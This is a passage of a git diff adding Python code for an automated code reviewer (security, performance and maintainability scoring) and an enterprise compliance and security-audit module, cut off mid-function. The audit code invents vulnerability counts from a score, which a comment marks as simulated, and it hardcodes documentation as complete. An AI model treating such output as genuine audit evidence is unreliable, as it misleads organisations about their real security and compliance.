Convert Bandit results to CodeIssue format + for result in manager.get_issue_list(): + issues.append(CodeIssue( + file_path=result.filename, + line_number=result.lineno, + severity=result.severity, + issue_type="security", + description=result.text, + recommendation=f"Bandit {result.test_id}: {result.text}", + confidence=self._convert_bandit_confidence(result.confidence), + cwe_id=getattr(result, 'cwe_id', None) + )) + + except Exception as e: + self.logger.warning(f"Bandit analysis failed for {file_path}: {str(e)}") + + return issues + + def _get_security_severity(self, category: str, line: str) -> Tuple[str, str]: + """Get severity and recommendation for security issue""" + + severity_map = { + "hardcoded_credentials": ("critical", "Use environment variables or secure vaults"), + "command_injection": ("critical", "Use parameterized commands and input validation"), + "sql_injection": ("critical", "Use parameterized queries and prepared statements"), + "path_traversal": ("high", "Validate and sanitize file paths"), + "insecure_random": ("medium", "Use cryptographically secure random functions") + } + + return severity_map.get(category, ("medium", "Review for security implications")) + + def _convert_bandit_confidence(self, confidence: str) -> float: + """Convert Bandit confidence to numeric value""" + + confidence_map = { + "HIGH": 0.9, + "MEDIUM": 0.7, + "LOW": 0.5 + } + + return confidence_map.get(confidence, 0.6) + +class PerformanceAnalyzer: + """Performance analysis and optimization identification""" + + def __init__(self): + self.logger = logging.getLogger("performance_analyzer") + + self.performance_patterns = { + "inefficient_loops": [ + r"for.*in.*range\(len\(", + r"while.*len\(" + ], + "string_concatenation": [ + r"\+\s*['\"].*['\"]", + r".*\+=.*['\"]" + ], + "global_variables": [ + r"^global\s+\w+" + ], + "nested_loops": [], # Detected via AST + "database_queries_in_loops": [], # Detected via AST + } + + async def analyze_performance(self, file_paths: 
List[str]) -> List[CodeIssue]: + """Comprehensive performance analysis""" + + performance_issues = [] + + for file_path in file_paths: + if not file_path.endswith('.py'): + continue + + self.logger.info(f"Performance analysis: {file_path}") + + try: + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Pattern-based analysis + pattern_issues = await self._analyze_performance_patterns(file_path, content) + performance_issues.extend(pattern_issues) + + # AST-based analysis for complex patterns + ast_issues = await self._analyze_ast_performance(file_path, content) + performance_issues.extend(ast_issues) + + except Exception as e: + self.logger.error(f"Error analyzing {file_path}: {str(e)}") + + return performance_issues + + async def _analyze_performance_patterns(self, file_path: str, content: str) -> List[CodeIssue]: + """Pattern-based performance issue detection""" + + issues = [] + lines = content.split('\n') + + for category, patterns in self.performance_patterns.items(): + if not patterns: # Skip empty pattern lists + continue + + for pattern in patterns: + for line_num, line in enumerate(lines, 1): + if re.search(pattern, line): + severity, recommendation = self._get_performance_severity(category) + + issues.append(CodeIssue( + file_path=file_path, + line_number=line_num, + severity=severity, + issue_type="performance", + description=f"Performance issue - {category.replace('_', ' ')}: {line.strip()}", + recommendation=recommendation + )) + + return issues + + async def _analyze_ast_performance(self, file_path: str, content: str) -> List[CodeIssue]: + """AST-based performance analysis""" + + issues = [] + + try: + tree = ast.parse(content) + + class PerformanceVisitor(ast.NodeVisitor): + def __init__(self): + self.issues = [] + self.loop_depth = 0 + self.in_loop = False + + def visit_For(self, node): + self.loop_depth += 1 + old_in_loop = self.in_loop + self.in_loop = True + + # Check for nested loops + if self.loop_depth > 2: + 
self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="performance", + description="Deeply nested loops detected", + recommendation="Consider algorithm optimization or breaking into functions" + )) + + self.generic_visit(node) + self.loop_depth -= 1 + self.in_loop = old_in_loop + + def visit_While(self, node): + self.loop_depth += 1 + old_in_loop = self.in_loop + self.in_loop = True + + if self.loop_depth > 2: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="performance", + description="Deeply nested while loops detected", + recommendation="Consider algorithm optimization" + )) + + self.generic_visit(node) + self.loop_depth -= 1 + self.in_loop = old_in_loop + + def visit_Call(self, node): + # Check for database calls in loops + if self.in_loop and isinstance(node.func, ast.Attribute): + method_name = node.func.attr + if method_name in ['execute', 'query', 'find', 'get']: + self.issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="high", + issue_type="performance", + description="Potential database query in loop", + recommendation="Move query outside loop or use batch operations" + )) + + self.generic_visit(node) + + visitor = PerformanceVisitor() + visitor.visit(tree) + issues.extend(visitor.issues) + + except SyntaxError: + pass # Skip files with syntax errors + + return issues + + def _get_performance_severity(self, category: str) -> Tuple[str, str]: + """Get severity and recommendation for performance issue""" + + severity_map = { + "inefficient_loops": ("medium", "Use enumerate() or direct iteration"), + "string_concatenation": ("low", "Use string formatting or join() for multiple concatenations"), + "global_variables": ("low", "Consider using class attributes or function parameters"), + "nested_loops": ("medium", "Optimize algorithm complexity"), + "database_queries_in_loops": ("high", "Use batch 
operations or optimize query placement") + } + + return severity_map.get(category, ("low", "Review for performance implications")) + +class MaintainabilityAnalyzer: + """Code maintainability and quality analysis""" + + def __init__(self): + self.logger = logging.getLogger("maintainability_analyzer") + + async def analyze_maintainability(self, file_paths: List[str]) -> Tuple[List[CodeIssue], Dict[str, Any]]: + """Comprehensive maintainability analysis""" + + maintainability_issues = [] + metrics = { + "complexity_metrics": {}, + "documentation_coverage": 0.0, + "code_duplication": {}, + "naming_conventions": {} + } + + for file_path in file_paths: + if not file_path.endswith('.py'): + continue + + self.logger.info(f"Maintainability analysis: {file_path}") + + try: + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Complexity analysis + complexity_issues, complexity_metrics = await self._analyze_complexity(file_path, content) + maintainability_issues.extend(complexity_issues) + metrics["complexity_metrics"][file_path] = complexity_metrics + + # Documentation analysis + doc_issues, doc_metrics = await self._analyze_documentation(file_path, content) + maintainability_issues.extend(doc_issues) + + # Code duplication detection + duplication_issues = await self._detect_code_duplication(file_path, content) + maintainability_issues.extend(duplication_issues) + + except Exception as e: + self.logger.error(f"Error analyzing {file_path}: {str(e)}") + + return maintainability_issues, metrics + + async def _analyze_complexity(self, file_path: str, content: str) -> Tuple[List[CodeIssue], Dict[str, Any]]: + """Analyze cyclomatic complexity and other complexity metrics""" + + issues = [] + metrics = { + "cyclomatic_complexity": 0, + "lines_of_code": 0, + "function_count": 0, + "class_count": 0, + "max_function_complexity": 0 + } + + try: + tree = ast.parse(content) + + class ComplexityVisitor(ast.NodeVisitor): + def __init__(self): + self.complexity = 1 
# Base complexity + self.function_complexities = [] + self.function_count = 0 + self.class_count = 0 + self.current_function = None + self.current_complexity = 1 + + def visit_FunctionDef(self, node): + self.function_count += 1 + old_complexity = self.current_complexity + old_function = self.current_function + + self.current_function = node.name + self.current_complexity = 1 + + self.generic_visit(node) + + # Check if function complexity is too high + if self.current_complexity > 10: + issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="medium", + issue_type="maintainability", + description=f"High cyclomatic complexity in function '{node.name}': {self.current_complexity}", + recommendation="Consider breaking down function into smaller functions" + )) + + self.function_complexities.append(self.current_complexity) + self.current_complexity = old_complexity + self.current_function = old_function + + def visit_ClassDef(self, node): + self.class_count += 1 + self.generic_visit(node) + + def visit_If(self, node): + self.current_complexity += 1 + self.generic_visit(node) + + def visit_For(self, node): + self.current_complexity += 1 + self.generic_visit(node) + + def visit_While(self, node): + self.current_complexity += 1 + self.generic_visit(node) + + def visit_Try(self, node): + self.current_complexity += len(node.handlers) + self.generic_visit(node) + + visitor = ComplexityVisitor() + visitor.visit(tree) + + lines = content.split('\n') + metrics["lines_of_code"] = len([line for line in lines if line.strip() and not line.strip().startswith('#')]) + metrics["function_count"] = visitor.function_count + metrics["class_count"] = visitor.class_count + metrics["cyclomatic_complexity"] = sum(visitor.function_complexities) if visitor.function_complexities else 1 + metrics["max_function_complexity"] = max(visitor.function_complexities) if visitor.function_complexities else 0 + + except SyntaxError: + pass # Skip files with syntax errors + + 
return issues, metrics + + async def _analyze_documentation(self, file_path: str, content: str) -> Tuple[List[CodeIssue], Dict[str, Any]]: + """Analyze documentation coverage and quality""" + + issues = [] + metrics = {"documented_functions": 0, "total_functions": 0} + + try: + tree = ast.parse(content) + + class DocVisitor(ast.NodeVisitor): + def __init__(self): + self.total_functions = 0 + self.documented_functions = 0 + + def visit_FunctionDef(self, node): + self.total_functions += 1 + + # Check if function has docstring + if (node.body and + isinstance(node.body[0], ast.Expr) and + isinstance(node.body[0].value, ast.Str)): + self.documented_functions += 1 + else: + # Only report missing docstrings for non-private functions + if not node.name.startswith('_'): + issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="low", + issue_type="maintainability", + description=f"Missing docstring for function '{node.name}'", + recommendation="Add descriptive docstring" + )) + + self.generic_visit(node) + + def visit_ClassDef(self, node): + # Check if class has docstring + if not (node.body and + isinstance(node.body[0], ast.Expr) and + isinstance(node.body[0].value, ast.Str)): + issues.append(CodeIssue( + file_path=file_path, + line_number=node.lineno, + severity="low", + issue_type="maintainability", + description=f"Missing docstring for class '{node.name}'", + recommendation="Add descriptive class docstring" + )) + + self.generic_visit(node) + + visitor = DocVisitor() + visitor.visit(tree) + + metrics["documented_functions"] = visitor.documented_functions + metrics["total_functions"] = visitor.total_functions + + except SyntaxError: + pass + + return issues, metrics + + async def _detect_code_duplication(self, file_path: str, content: str) -> List[CodeIssue]: + """Detect code duplication patterns""" + + issues = [] + lines = content.split('\n') + + # Simple line-based duplication detection + line_counts = Counter() + + for line_num, line 
in enumerate(lines, 1): + stripped = line.strip() + if len(stripped) > 20 and not stripped.startswith('#'): # Ignore short lines and comments + line_counts[stripped] += 1 + + if line_counts[stripped] == 3: # Report after 3 occurrences + issues.append(CodeIssue( + file_path=file_path, + line_number=line_num, + severity="low", + issue_type="maintainability", + description=f"Potential code duplication: {stripped[:50]}...", + recommendation="Consider extracting common code into functions" + )) + + return issues + +class ComprehensiveCodeReviewer: + """Main code review orchestrator""" + + def __init__(self): + self.logger = logging.getLogger("code_reviewer") + self.security_analyzer = SecurityAnalyzer() + self.performance_analyzer = PerformanceAnalyzer() + self.maintainability_analyzer = MaintainabilityAnalyzer() + + async def conduct_comprehensive_review(self, project_path: str, + include_patterns: Optional[List[str]] = None, + exclude_patterns: Optional[List[str]] = None) -> ReviewResults: + """Conduct comprehensive code review""" + + self.logger.info(f"Starting comprehensive code review of {project_path}") + start_time = datetime.now() + + # Discover files to analyze + file_paths = await self._discover_files(project_path, include_patterns, exclude_patterns) + + if not file_paths: + self.logger.warning("No files found for analysis") + return ReviewResults(0, 0) + + self.logger.info(f"Analyzing {len(file_paths)} files") + + # Calculate total lines + total_lines = 0 + for file_path in file_paths: + try: + with open(file_path, 'r', encoding='utf-8') as f: + total_lines += len(f.readlines()) + except: + pass + + # Run all analyzers concurrently + security_task = asyncio.create_task(self.security_analyzer.analyze_security(file_paths)) + performance_task = asyncio.create_task(self.performance_analyzer.analyze_performance(file_paths)) + maintainability_task = asyncio.create_task(self.maintainability_analyzer.analyze_maintainability(file_paths)) + + # Wait for all analyses to 
complete + security_issues = await security_task + performance_issues = await performance_task + maintainability_issues, maintainability_metrics = await maintainability_task + + # Combine all issues + all_issues = security_issues + performance_issues + maintainability_issues + + # Calculate scores + security_score = await self._calculate_security_score(security_issues) + maintainability_score = await self._calculate_maintainability_score(maintainability_issues) + performance_score = await self._calculate_performance_score(performance_issues) + + overall_score = (security_score + maintainability_score + performance_score) / 3 + + # Create comprehensive results + results = ReviewResults( + total_files_analyzed=len(file_paths), + total_lines_analyzed=total_lines, + issues=all_issues, + metrics=maintainability_metrics, + security_score=security_score, + maintainability_score=maintainability_score, + performance_score=performance_score, + overall_score=overall_score + ) + + # Generate review report + await self._generate_review_report(results, project_path) + + duration = datetime.now() - start_time + self.logger.info(f"Code review completed in {duration.total_seconds():.2f}s") + self.logger.info(f"Overall score: {overall_score:.1f}/100") + + return results + + async def _discover_files(self, project_path: str, + include_patterns: Optional[List[str]] = None, + exclude_patterns: Optional[List[str]] = None) -> List[str]: + """Discover files to analyze""" + + file_paths = [] + project_path = Path(project_path) + + include_patterns = include_patterns or ['*.py'] + exclude_patterns = exclude_patterns or [ + '*/venv/*', '*/env/*', '*/__pycache__/*', + '*/node_modules/*', '*/.*/*', '*/.git/*' + ] + + def should_include(file_path: Path) -> bool: + path_str = str(file_path) + + # Check exclude patterns + for exclude in exclude_patterns: + if exclude.replace('*', '.*') in path_str: + return False + + # Check include patterns + for include in include_patterns: + if 
file_path.match(include): + return True + + return False + + # Walk through project directory + for root, dirs, files in os.walk(project_path): + # Skip hidden and excluded directories + dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ['__pycache__', 'venv', 'env']] + + for file in files: + file_path = Path(root) / file + if should_include(file_path): + file_paths.append(str(file_path)) + + return file_paths + + async def _calculate_security_score(self, security_issues: List[CodeIssue]) -> float: + """Calculate security score based on issues found""" + + if not security_issues: + return 100.0 + + severity_weights = { + "critical": -20, + "high": -10, + "medium": -5, + "low": -2, + "info": -1 + } + + total_deduction = sum(severity_weights.get(issue.severity, -1) for issue in security_issues) + return max(0, 100 + total_deduction) + + async def _calculate_maintainability_score(self, maintainability_issues: List[CodeIssue]) -> float: + """Calculate maintainability score""" + + base_score = 100.0 + + for issue in maintainability_issues: + if issue.severity == "high": + base_score -= 5 + elif issue.severity == "medium": + base_score -= 3 + else: + base_score -= 1 + + return max(0, base_score) + + async def _calculate_performance_score(self, performance_issues: List[CodeIssue]) -> float: + """Calculate performance score""" + + base_score = 100.0 + + for issue in performance_issues: + if issue.severity == "high": + base_score -= 8 + elif issue.severity == "medium": + base_score -= 4 + else: + base_score -= 2 + + return max(0, base_score) + + async def _generate_review_report(self, results: ReviewResults, project_path: str): + """Generate comprehensive review report""" + + report = { + "review_summary": { + "project_path": project_path, + "review_date": datetime.now().isoformat(), + "files_analyzed": results.total_files_analyzed, + "lines_analyzed": results.total_lines_analyzed, + "total_issues": len(results.issues), + "scores": { + "security": 
results.security_score, + "maintainability": results.maintainability_score, + "performance": results.performance_score, + "overall": results.overall_score + } + }, + "issue_breakdown": { + "by_severity": {}, + "by_type": {}, + "by_file": {} + }, + "recommendations": [], + "detailed_issues": [] + } + + # Analyze issue breakdown + severity_counts = Counter(issue.severity for issue in results.issues) + type_counts = Counter(issue.issue_type for issue in results.issues) + file_counts = Counter(issue.file_path for issue in results.issues) + + report["issue_breakdown"]["by_severity"] = dict(severity_counts) + report["issue_breakdown"]["by_type"] = dict(type_counts) + report["issue_breakdown"]["by_file"] = dict(file_counts.most_common(10)) # Top 10 files + + # Generate high-level recommendations + if severity_counts.get("critical", 0) > 0: + report["recommendations"].append("Address critical security vulnerabilities immediately") + + if severity_counts.get("high", 0) > 5: + report["recommendations"].append("Focus on high-severity issues for immediate improvement") + + if results.security_score < 70: + report["recommendations"].append("Conduct security training and implement secure coding practices") + + if results.maintainability_score < 70: + report["recommendations"].append("Improve code documentation and reduce complexity") + + if results.performance_score < 70: + report["recommendations"].append("Optimize performance bottlenecks and algorithmic efficiency") + + # Add detailed issues (top 50 most severe) + sorted_issues = sorted(results.issues, + key=lambda x: {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}.get(x.severity, 0), + reverse=True) + + for issue in sorted_issues[:50]: + report["detailed_issues"].append({ + "file": issue.file_path, + "line": issue.line_number, + "severity": issue.severity, + "type": issue.issue_type, + "description": issue.description, + "recommendation": issue.recommendation, + "confidence": issue.confidence, + "cwe_id": 
issue.cwe_id + }) + + # Save report + report_path = Path(project_path) / "code_review_report.json" + with open(report_path, 'w', encoding='utf-8') as f: + json.dump(report, f, indent=2, ensure_ascii=False) + + self.logger.info(f"Review report saved to {report_path}") + + # Also create a summary markdown report + await self._generate_markdown_summary(report, project_path) + + async def _generate_markdown_summary(self, report: Dict[str, Any], project_path: str): + """Generate markdown summary report""" + + summary_path = Path(project_path) / "CODE_REVIEW_SUMMARY.md" + + with open(summary_path, 'w', encoding='utf-8') as f: + f.write("# Code Review Summary\n\n") + + # Overview + f.write("## Overview\n\n") + f.write(f"- **Files Analyzed**: {report['review_summary']['files_analyzed']}\n") + f.write(f"- **Lines Analyzed**: {report['review_summary']['lines_analyzed']}\n") + f.write(f"- **Total Issues**: {report['review_summary']['total_issues']}\n\n") + + # Scores + f.write("## Scores\n\n") + scores = report['review_summary']['scores'] + f.write(f"- **Overall Score**: {scores['overall']:.1f}/100\n") + f.write(f"- **Security Score**: {scores['security']:.1f}/100\n") + f.write(f"- **Maintainability Score**: {scores['maintainability']:.1f}/100\n") + f.write(f"- **Performance Score**: {scores['performance']:.1f}/100\n\n") + + # Issue breakdown + f.write("## Issue Breakdown\n\n") + + f.write("### By Severity\n\n") + for severity, count in report['issue_breakdown']['by_severity'].items(): + f.write(f"- **{severity.title()}**: {count}\n") + f.write("\n") + + f.write("### By Type\n\n") + for issue_type, count in report['issue_breakdown']['by_type'].items(): + f.write(f"- **{issue_type.title()}**: {count}\n") + f.write("\n") + + # Recommendations + f.write("## Recommendations\n\n") + for i, recommendation in enumerate(report['recommendations'], 1): + f.write(f"{i}. 
{recommendation}\n") + f.write("\n") + + # Top issues + f.write("## Top Critical Issues\n\n") + critical_issues = [issue for issue in report['detailed_issues'] + if issue['severity'] == 'critical'][:10] + + for issue in critical_issues: + f.write(f"### {issue['file']}:{issue['line']}\n\n") + f.write(f"**Type**: {issue['type']}\n\n") + f.write(f"**Description**: {issue['description']}\n\n") + f.write(f"**Recommendation**: {issue['recommendation']}\n\n") + f.write("---\n\n") + + self.logger.info(f"Markdown summary saved to {summary_path}") + +# Main execution interface +async def run_code_review(project_path: str, config: Optional[Dict[str, Any]] = None) -> ReviewResults: + """Run comprehensive code review""" + + config = config or {} + reviewer = ComprehensiveCodeReviewer() + + return await reviewer.conduct_comprehensive_review( + project_path=project_path, + include_patterns=config.get('include_patterns'), + exclude_patterns=config.get('exclude_patterns') + ) + +# CLI interface +if __name__ == "__main__": + import sys + + # Configure logging + logging.basicConfig( + level=logging.INFO, + format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' + ) + + if len(sys.argv) < 2: + print("Usage: python code_reviewer.py [config.json]") + sys.exit(1) + + project_path = sys.argv[1] + config = {} + + if len(sys.argv) > 2: + with open(sys.argv[2], 'r') as f: + config = json.load(f) + + # Run code review + async def main(): + results = await run_code_review(project_path, config) + print(f"\nCode review completed!") + print(f"Overall score: {results.overall_score:.1f}/100") + print(f"Total issues found: {len(results.issues)}") + + # Show issue breakdown + severity_counts = Counter(issue.severity for issue in results.issues) + print("\nIssue breakdown:") + for severity in ["critical", "high", "medium", "low", "info"]: + count = severity_counts.get(severity, 0) + if count > 0: + print(f" {severity.title()}: {count}") + + asyncio.run(main()) diff --git 
a/src/certification/enterprise_certification.py b/src/certification/enterprise_certification.py new file mode 100644 index 0000000000000000000000000000000000000000..9d88d45866de7ccb5fa343ccc53fc88e1a352b8b --- /dev/null +++ b/src/certification/enterprise_certification.py @@ -0,0 +1,645 @@ +""" +Enterprise Certification and Compliance Validation System for Cyber-LLM +Final compliance validation, security auditing, and enterprise readiness assessment + +Author: Muzan Sano +""" + +import asyncio +import json +import logging +import subprocess +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple, Union +from dataclasses import dataclass, field +from enum import Enum +from pathlib import Path +import yaml +import hashlib +import ssl +import socket +import requests + +from ..utils.logging_system import CyberLLMLogger, CyberLLMError, ErrorCategory +from ..governance.enterprise_governance import EnterpriseGovernanceManager, ComplianceFramework + +class CertificationStandard(Enum): + """Enterprise certification standards""" + SOC2_TYPE_II = "soc2_type_ii" + ISO27001 = "iso27001" + FEDRAMP_MODERATE = "fedramp_moderate" + NIST_CYBERSECURITY = "nist_cybersecurity" + GDPR_COMPLIANCE = "gdpr_compliance" + HIPAA_COMPLIANCE = "hipaa_compliance" + PCI_DSS = "pci_dss" + CSA_STAR = "csa_star" + +class ComplianceStatus(Enum): + """Compliance validation status""" + COMPLIANT = "compliant" + NON_COMPLIANT = "non_compliant" + PARTIAL_COMPLIANCE = "partial_compliance" + UNDER_REVIEW = "under_review" + NOT_APPLICABLE = "not_applicable" + +class SecurityRating(Enum): + """Security assessment ratings""" + EXCELLENT = "excellent" # 95-100% + GOOD = "good" # 85-94% + SATISFACTORY = "satisfactory" # 75-84% + NEEDS_IMPROVEMENT = "needs_improvement" # 60-74% + UNSATISFACTORY = "unsatisfactory" # <60% + +@dataclass +class ComplianceAssessment: + """Individual compliance assessment result""" + standard: CertificationStandard + status: ComplianceStatus + 
score: float # 0-100 + + # Assessment details + assessed_date: datetime + assessor: str + assessment_method: str + + # Compliance details + requirements_met: int + total_requirements: int + critical_gaps: List[str] = field(default_factory=list) + recommendations: List[str] = field(default_factory=list) + + # Evidence and documentation + evidence_files: List[str] = field(default_factory=list) + documentation_complete: bool = False + + # Remediation tracking + remediation_plan: Optional[str] = None + remediation_timeline: Optional[timedelta] = None + next_assessment_date: Optional[datetime] = None + +@dataclass +class SecurityAuditResult: + """Security audit result""" + audit_id: str + audit_date: datetime + audit_type: str + + # Overall rating + security_rating: SecurityRating + overall_score: float + + # Detailed findings + vulnerabilities_found: int + critical_vulnerabilities: int + high_vulnerabilities: int + medium_vulnerabilities: int + low_vulnerabilities: int + + # Categories assessed + network_security_score: float + application_security_score: float + data_protection_score: float + access_control_score: float + monitoring_score: float + incident_response_score: float + + # Recommendations + immediate_actions: List[str] = field(default_factory=list) + short_term_improvements: List[str] = field(default_factory=list) + long_term_strategy: List[str] = field(default_factory=list) + +class EnterpriseCertificationManager: + """Enterprise certification and compliance validation system""" + + def __init__(self, + governance_manager: EnterpriseGovernanceManager, + logger: Optional[CyberLLMLogger] = None): + + self.governance_manager = governance_manager + self.logger = logger or CyberLLMLogger(name="enterprise_certification") + + # Certification tracking + self.compliance_assessments = {} + self.security_audit_results = {} + self.certification_status = {} + + # Validation tools + self.validation_tools = {} + self.automated_checks = {} + + # Reporting + 
self.certification_reports = {} + + self.logger.info("Enterprise Certification Manager initialized") + + async def conduct_comprehensive_compliance_assessment(self, + standards: List[CertificationStandard]) -> Dict[str, ComplianceAssessment]: + """Conduct comprehensive compliance assessment for multiple standards""" + + assessments = {} + + for standard in standards: + try: + self.logger.info(f"Starting compliance assessment for {standard.value}") + + assessment = await self._assess_compliance_standard(standard) + assessments[standard.value] = assessment + + # Store assessment + self.compliance_assessments[standard.value] = assessment + + self.logger.info(f"Completed assessment for {standard.value}", + score=assessment.score, + status=assessment.status.value) + + except Exception as e: + self.logger.error(f"Failed to assess {standard.value}", error=str(e)) + + # Create failed assessment record + assessments[standard.value] = ComplianceAssessment( + standard=standard, + status=ComplianceStatus.NON_COMPLIANT, + score=0.0, + assessed_date=datetime.now(), + assessor="automated_system", + assessment_method="automated_compliance_check", + requirements_met=0, + total_requirements=1, + critical_gaps=[f"Assessment failed: {str(e)}"] + ) + + # Generate comprehensive report + await self._generate_compliance_report(assessments) + + return assessments + + async def _assess_compliance_standard(self, standard: CertificationStandard) -> ComplianceAssessment: + """Assess compliance for a specific standard""" + + if standard == CertificationStandard.SOC2_TYPE_II: + return await self._assess_soc2_compliance() + elif standard == CertificationStandard.ISO27001: + return await self._assess_iso27001_compliance() + elif standard == CertificationStandard.FEDRAMP_MODERATE: + return await self._assess_fedramp_compliance() + elif standard == CertificationStandard.NIST_CYBERSECURITY: + return await self._assess_nist_compliance() + elif standard == CertificationStandard.GDPR_COMPLIANCE: + 
return await self._assess_gdpr_compliance() + elif standard == CertificationStandard.HIPAA_COMPLIANCE: + return await self._assess_hipaa_compliance() + elif standard == CertificationStandard.PCI_DSS: + return await self._assess_pci_dss_compliance() + else: + return await self._assess_generic_compliance(standard) + + async def _assess_soc2_compliance(self) -> ComplianceAssessment: + """Assess SOC 2 Type II compliance""" + + # SOC 2 Trust Service Criteria assessment + criteria_scores = {} + + # Security (Common Criteria) + security_checks = [ + await self._check_access_controls(), + await self._check_network_security(), + await self._check_data_encryption(), + await self._check_incident_response(), + await self._check_vulnerability_management() + ] + criteria_scores['security'] = sum(security_checks) / len(security_checks) + + # Availability + availability_checks = [ + await self._check_system_availability(), + await self._check_backup_procedures(), + await self._check_disaster_recovery(), + await self._check_capacity_planning() + ] + criteria_scores['availability'] = sum(availability_checks) / len(availability_checks) + + # Processing Integrity + integrity_checks = [ + await self._check_data_validation(), + await self._check_processing_controls(), + await self._check_error_handling(), + await self._check_data_quality() + ] + criteria_scores['processing_integrity'] = sum(integrity_checks) / len(integrity_checks) + + # Confidentiality + confidentiality_checks = [ + await self._check_data_classification(), + await self._check_confidentiality_agreements(), + await self._check_data_disposal(), + await self._check_confidential_data_protection() + ] + criteria_scores['confidentiality'] = sum(confidentiality_checks) / len(confidentiality_checks) + + # Privacy (if applicable) + privacy_checks = [ + await self._check_privacy_notice(), + await self._check_consent_management(), + await self._check_data_subject_rights(), + await self._check_privacy_impact_assessment() + ] + 
criteria_scores['privacy'] = sum(privacy_checks) / len(privacy_checks) + + # Calculate overall score + overall_score = sum(criteria_scores.values()) / len(criteria_scores) * 100 + + # Determine compliance status + if overall_score >= 90: + status = ComplianceStatus.COMPLIANT + elif overall_score >= 75: + status = ComplianceStatus.PARTIAL_COMPLIANCE + else: + status = ComplianceStatus.NON_COMPLIANT + + # Generate recommendations + recommendations = [] + for criterion, score in criteria_scores.items(): + if score < 0.8: + recommendations.append(f"Improve {criterion} controls (current score: {score:.1%})") + + return ComplianceAssessment( + standard=CertificationStandard.SOC2_TYPE_II, + status=status, + score=overall_score, + assessed_date=datetime.now(), + assessor="automated_compliance_system", + assessment_method="soc2_automated_assessment", + requirements_met=sum(1 for score in criteria_scores.values() if score >= 0.8), + total_requirements=len(criteria_scores), + critical_gaps=[criterion for criterion, score in criteria_scores.items() if score < 0.6], + recommendations=recommendations, + documentation_complete=True + ) + + async def _assess_iso27001_compliance(self) -> ComplianceAssessment: + """Assess ISO 27001 compliance""" + + # ISO 27001 Control categories + control_scores = {} + + # Information Security Policies (A.5) + control_scores['policies'] = await self._check_security_policies() + + # Organization of Information Security (A.6) + control_scores['organization'] = await self._check_security_organization() + + # Human Resource Security (A.7) + control_scores['human_resources'] = await self._check_hr_security() + + # Asset Management (A.8) + control_scores['asset_management'] = await self._check_asset_management() + + # Access Control (A.9) + control_scores['access_control'] = await self._check_access_controls() + + # Cryptography (A.10) + control_scores['cryptography'] = await self._check_cryptographic_controls() + + # Physical and Environmental Security 
(A.11) + control_scores['physical_security'] = await self._check_physical_security() + + # Operations Security (A.12) + control_scores['operations_security'] = await self._check_operations_security() + + # Communications Security (A.13) + control_scores['communications_security'] = await self._check_communications_security() + + # System Acquisition, Development and Maintenance (A.14) + control_scores['system_development'] = await self._check_system_development_security() + + # Supplier Relationships (A.15) + control_scores['supplier_relationships'] = await self._check_supplier_security() + + # Information Security Incident Management (A.16) + control_scores['incident_management'] = await self._check_incident_management() + + # Information Security Aspects of Business Continuity Management (A.17) + control_scores['business_continuity'] = await self._check_business_continuity() + + # Compliance (A.18) + control_scores['compliance'] = await self._check_regulatory_compliance() + + # Calculate overall score + overall_score = sum(control_scores.values()) / len(control_scores) * 100 + + # Determine compliance status + if overall_score >= 85: + status = ComplianceStatus.COMPLIANT + elif overall_score >= 70: + status = ComplianceStatus.PARTIAL_COMPLIANCE + else: + status = ComplianceStatus.NON_COMPLIANT + + return ComplianceAssessment( + standard=CertificationStandard.ISO27001, + status=status, + score=overall_score, + assessed_date=datetime.now(), + assessor="iso27001_automated_assessor", + assessment_method="iso27001_control_assessment", + requirements_met=sum(1 for score in control_scores.values() if score >= 0.7), + total_requirements=len(control_scores), + critical_gaps=[control for control, score in control_scores.items() if score < 0.5], + recommendations=[f"Strengthen {control} (score: {score:.1%})" for control, score in control_scores.items() if score < 0.8], + documentation_complete=True + ) + + async def conduct_comprehensive_security_audit(self) -> 
SecurityAuditResult: + """Conduct comprehensive security audit""" + + audit_id = f"security_audit_{datetime.now().strftime('%Y%m%d_%H%M%S')}" + + try: + self.logger.info("Starting comprehensive security audit") + + # Network security assessment + network_score = await self._audit_network_security() + + # Application security assessment + app_score = await self._audit_application_security() + + # Data protection assessment + data_score = await self._audit_data_protection() + + # Access control assessment + access_score = await self._audit_access_control() + + # Monitoring and logging assessment + monitoring_score = await self._audit_monitoring_logging() + + # Incident response assessment + incident_score = await self._audit_incident_response() + + # Calculate overall score + scores = [network_score, app_score, data_score, access_score, monitoring_score, incident_score] + overall_score = sum(scores) / len(scores) + + # Determine security rating + if overall_score >= 95: + rating = SecurityRating.EXCELLENT + elif overall_score >= 85: + rating = SecurityRating.GOOD + elif overall_score >= 75: + rating = SecurityRating.SATISFACTORY + elif overall_score >= 60: + rating = SecurityRating.NEEDS_IMPROVEMENT + else: + rating = SecurityRating.UNSATISFACTORY + + # Simulate vulnerability counts (in production, would use actual scan results) + critical_vulns = max(0, int((100 - overall_score) / 20)) + high_vulns = max(0, int((100 - overall_score) / 15)) + medium_vulns = max(0, int((100 - overall_score) / 10)) + low_vulns = max(0, int((100 - overall_score) / 5)) + total_vulns = critical_vulns + high_vulns + medium_vulns + low_vulns + + # Generate recommendations + immediate_actions = [] + short_term = [] + long_term = [] + + if critical_vulns > 0: + immediate_actions.append(f"Address {critical_vulns} critical vulnerabilities immediately") + if network_score < 80: + immediate_actions.append("Strengthen network security controls") + if access_score < 75: + 
